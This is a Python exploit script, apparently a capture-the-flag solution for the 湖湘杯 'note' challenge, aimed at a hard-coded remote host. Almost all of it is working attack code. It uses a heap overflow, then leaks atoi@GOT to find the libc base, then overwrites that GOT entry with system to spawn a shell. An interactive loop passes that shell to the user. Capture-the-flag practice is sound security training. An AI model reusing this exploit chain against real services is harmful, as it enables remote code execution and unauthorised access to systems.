  • 湖湘杯_note

    import struct
    from threading import Thread

    from zio import *
    
    # Where the exploit runs. The remote instance is the active choice; the
    # local binary path is kept for debugging against './note' (zio is handed
    # `target` directly in exp(), so presumably either form is accepted).
    LOCAL_TARGET = './note'
    REMOTE_TARGET = ('114.215.220.77', 10001)
    target = REMOTE_TARGET
    
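    def interact(io):
        """Hand the connection over to the user: drain everything the remote
        sends and forward each non-empty line typed on stdin.

        A background thread keeps reading from `io` in one-second slices; the
        data itself is dropped here because the connection is opened with
        zio's print_read set (see exp), so what is read is presumably already
        echoed to the terminal. The thread stops at the first read error and
        is a daemon, so it cannot keep the process alive after the main loop
        returns. The main loop returns on EOF of stdin; Ctrl-C propagates.

        Works under Python 2 (raw_input) and Python 3 (input).
        """
        try:
            read_line = raw_input  # Python 2
        except NameError:
            read_line = input  # Python 3

        def run_recv():
            # Drain the socket until a read fails (connection closed, etc.).
            # A bare `except:` would also swallow SystemExit; Exception is enough.
            while True:
                try:
                    io.read_until_timeout(timeout=1)
                except Exception:
                    return

        t1 = Thread(target=run_recv)
        t1.daemon = True
        t1.start()
        while True:
            try:
                d = read_line()
            except EOFError:
                # stdin closed: nothing more to forward.
                return
            if d != '':
                io.writeline(d)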
    
    
    def add(io, length, buff):
        """Menu option 1: create a note, requesting `length` bytes and sending
        `buff` as its content.

        Each reply is sent only after the matching prompt fragment arrives, so
        the exchange stays in lock-step with the service's menu. `length` is
        sent as a decimal string; `buff` goes out verbatim via writeline.
        """
        exchange = (
            ('--->>', '1'),        # main menu: "add"
            (':', str(length)),    # size prompt
            (':', buff),           # content prompt
        )
        for prompt, reply in exchange:
            io.read_until(prompt)
            io.writeline(reply)
    
    def edit(io, id, buff):
        """Menu option 3 (edit note `id`), sub-option 2, sending `buff` as the data.

        The sub-menu prompt contains the word "append"; in exp() this variant is
        the one used to write past the note's buffer, so sub-option 2 is
        presumably the append path -- confirm against the binary. `id` is sent
        as a decimal string, `buff` verbatim.
        """
        exchange = [
            ('--->>', '3'),      # main menu: "edit"
            ('id', str(id)),     # which note
            ('append', '2'),     # edit sub-menu: option 2
            (':', buff),         # the data
        ]
        for prompt, reply in exchange:
            io.read_until(prompt)
            io.writeline(reply)
    
    def edit2(io, id, buff):
        """Menu option 3 (edit note `id`), sub-option 1, sending `buff` as the data.

        Same exchange as edit() except for the sub-menu choice. In exp() this
        variant writes a single 8-byte value into the note, so sub-option 1 is
        presumably the overwrite (non-append) path -- confirm against the
        binary. `id` is sent as a decimal string, `buff` verbatim.
        """
        def answer(prompt, reply):
            # Wait for the prompt fragment, then send the reply as one line.
            io.read_until(prompt)
            io.writeline(reply)

        answer('--->>', '3')
        answer('id', str(id))
        answer('append', '1')
        answer(':', buff)
    
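    def show(io, id):
        """Menu option 2: show note `id` and parse the leaked 64-bit value.

        The service prints the note content after the text "is "; exp()
        arranges for that content to be a raw pointer, so the rest of the line
        is read, the trailing newline stripped, NUL-padded to 8 bytes and
        unpacked little-endian. Returns the leaked value as an int.

        The original listing had the escape sequences in this function garbled
        ('\\n' broken across lines, 'x00' without its backslash, which makes
        ljust raise TypeError); they are restored here, and zio's l64 is
        replaced by struct.unpack so the parsing is explicit.

        Caveats: readline() stops at the first 0x0a byte, so a leaked pointer
        that happens to contain 0x0a is truncated (the result is then wrong,
        not an error); a leak longer than 8 bytes raises struct.error.
        """
        io.read_until('--->>')
        io.writeline('2')
        io.read_until('id')
        io.writeline(str(id))
        io.read_until('is ')
        # bytes literals keep this working on Python 2 (str) and Python 3 (bytes).
        leaked = io.readline().strip(b'\n').ljust(8, b'\x00')
        return struct.unpack('<Q', leaked)[0]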
    
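    def exp(target, atoi_off=0x36e80, system_off=0x45390):
        """Run the exploit against `target` (path of the local binary or a
        (host, port) tuple, passed straight to zio) and hand over an
        interactive shell on success.

        What the script does, step by step (the heap-layout reasoning is the
        original author's and is not verifiable from this file alone):
          1. Overflow the 'name' field with 0x30 bytes of filler followed by
             the 8-byte words 0 and 0x70, and send the same two words for
             'address' -- presumably planting a fake chunk header.
          2. Add note 0 (128 bytes requested, 94 bytes of content), then use
             the append path of edit() to write past its buffer: the original
             comment says this overwrites a note pointer so the next note's
             pointer slot ends up under control (value l32(0x6020E0 + 0x40)).
          3. Add a second note whose content is atoi@GOT (0x602088); show(0)
             then prints what note 0's pointer refers to -- the resolved atoi
             address, i.e. the libc leak.
          4. libc base = leak - atoi_off; system = base + system_off; the
             overwrite path (edit2) writes system over atoi@GOT.
          5. The menu parses its choice with atoi, so sending 'sh' calls
             system("sh").

        `atoi_off`/`system_off` default to the values hard-coded in the
        original (they look like the common glibc 2.23 / Ubuntu 16.04 pair --
        confirm against the remote libc and override if it differs). The GOT
        and bss addresses are fixed in the binary; addresses in the 0x602000
        range suggest a non-PIE build, confirm with the binary.
        """
        io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))

        # Step 1: name/address overflow with the fake 0 / 0x70 header words.
        io.read_until('name')
        io.write('a' * 0x30 + l64(0) + l64(0x70))
        io.read_until('address')
        io.writeline(l64(0) + l64(0x70))

        # Step 2: note 0, then append past it to reach the pointer slot.
        add(io, 128, 94 * 'a')
        # io.gdb_hint()  # uncomment to attach gdb when running locally

        edit(io, 0, 'b' * 33 + 'c' + l32(0x6020E0 + 0x40))
        atoi_got = 0x602088  # atoi@GOT in the target binary

        # Step 3: the new note's content is the GOT entry address; because of
        # the pointer overwrite, show(0) prints *atoi@GOT -- the libc leak.
        add(io, 0x60, l64(atoi_got))
        atoi_addr = show(io, 0)
        base = atoi_addr - atoi_off
        print(hex(base))
        system = base + system_off
        print(hex(system))

        # Step 4/5: atoi@GOT := system, then the next menu "choice" is a shell
        # command for system().
        edit2(io, 0, l64(system))
        io.read_until('--->>')
        io.writeline('sh')
        interact(io)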
    
    
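    # Only fire the exploit when run as a script, not when the helpers above are
    # imported (e.g. to reuse add/edit/show interactively).
    if __name__ == '__main__':
        exp(target)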
    
    
    
  • 原文地址:https://www.cnblogs.com/volva/p/11814390.html